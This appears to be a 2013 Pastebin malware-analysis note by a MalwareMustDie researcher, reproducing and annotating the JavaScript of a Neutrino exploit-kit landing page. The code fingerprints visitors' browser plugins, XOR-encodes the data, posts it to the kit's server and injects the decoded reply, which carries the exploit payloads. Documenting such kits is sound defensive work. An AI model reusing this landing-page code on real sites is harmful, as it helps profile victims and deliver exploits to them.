Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // #MalwareMustDie!
- // My personal note..
- // New form of Neutrino EK landing page?
- // A quest! Where's the XOR data now? :-D
- <script src='xsvhwjx.js'></script>
- <script src='qmqsfiutp.js'>
- </script><script src='hrcl.js'></script>
- <link href='xbbcukphokdo.css' rel='stylesheet'>
- <link href='nhpgbsrcogf.css' rel='stylesheet'>
- <link href='bbehoufqwh.css' rel='stylesheet'>
- <script src='gdhclsjileqh.js'></script>
- <script src='nrezixfqsy.js'></script>
- <script src='sgxvswm.js'></script>
- <script src='ztblmkuxokfcyxgy.js'></script>
- <script type="text/javascript" src="index.js"></script> // <=== @malwaremustdie: Plugindetect??
- <script src='dwwccp.js'></script>
- <script src='zkbvwzvq.js'></script>
- <script>
- $(document).ready(function()
- {
- rq(
- "51f2394faaa2cc390a075f4c",
- "eyhuui", // <== @malforsec & @malwaremustdie: OK this is the key :-)
- "uvkotuiae", // <=== @malwaremustdie: POST command value
- "ngrdddfrrlrzro",
- "gfsjmndvvz"
- )
- }
- );
- function rq(a,c,f,e,g)
- {
- var d=PluginDetect.getVersion,b=[]; // // <== @malwaremustdie: PoC of PluginDetect v0.8.0
- b.push("hid:::"+a);
- b.push("adobe_reader:::"+d("AdobeReader"));
- b.push("java:::"+d("Java"));
- b.push("flash:::"+d("Flash"));
- b.push("quick_time:::"+d("QuickTime"));
- b.push("real_player:::"+d("RealPlayer"));
- b.push("shockwave:::"+d("Shockwave"));
- b.push("silver_light:::"+d("Silverlight"));
- b.push("vlc:::"+d("VLC"));
- b.push("wmp:::"+d("WMP"));
- b.push("office:::"+office_ver());
- a={};
- a[e]=c; // <=== c = "51f2394faaa2cc390a075f4c"
- a[g]=encodeURIComponent(www(b.join(";;;"),c)); // <== @malwaremustdie: Assembling the POST query.
- $.post(f,a,function(a,
- b)
- {
- $("body").append(www(decodeURIComponent(a),c)) // <== @malwaremustdie: A DAT www is XOR function.
- }
- )
- }
- function www(a,c) // <=== @malwaremustdie: XOR function name in camouflaged
- {
- for(var f="",e=0,g=0,e=0;e<a.length;e++) // <=== @malwaremustdie: XOR logic
- g=Math.floor(e%c.length),
- f+=String.fromCharCode(a.charCodeAt(e)^c.charCodeAt(g));
- return f
- }
- function office_ver()
- {
- var a=0,c=0;
- try
- {
- a=new ActiveXObject("SharePoint.OpenDocuments.4")
- }
- catch(f)
- {
- }
- try
- {
- c=new ActiveXObject("SharePoint.OpenDocuments.3")
- }
- catch(e)
- {
- } // <=== @malwaremustdie: here goes the exploit payloads access...
- return"object"==typeof a&&"object"==typeof c?"2010":"number"==typeof a&&"object"==typeof c?"2007":null
- };
- </script>
- ----
- #MalwareMustDie!
- @unixfreaxjp ~]$ date
- Sat Jul 27 01:17:40 JST 2013
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement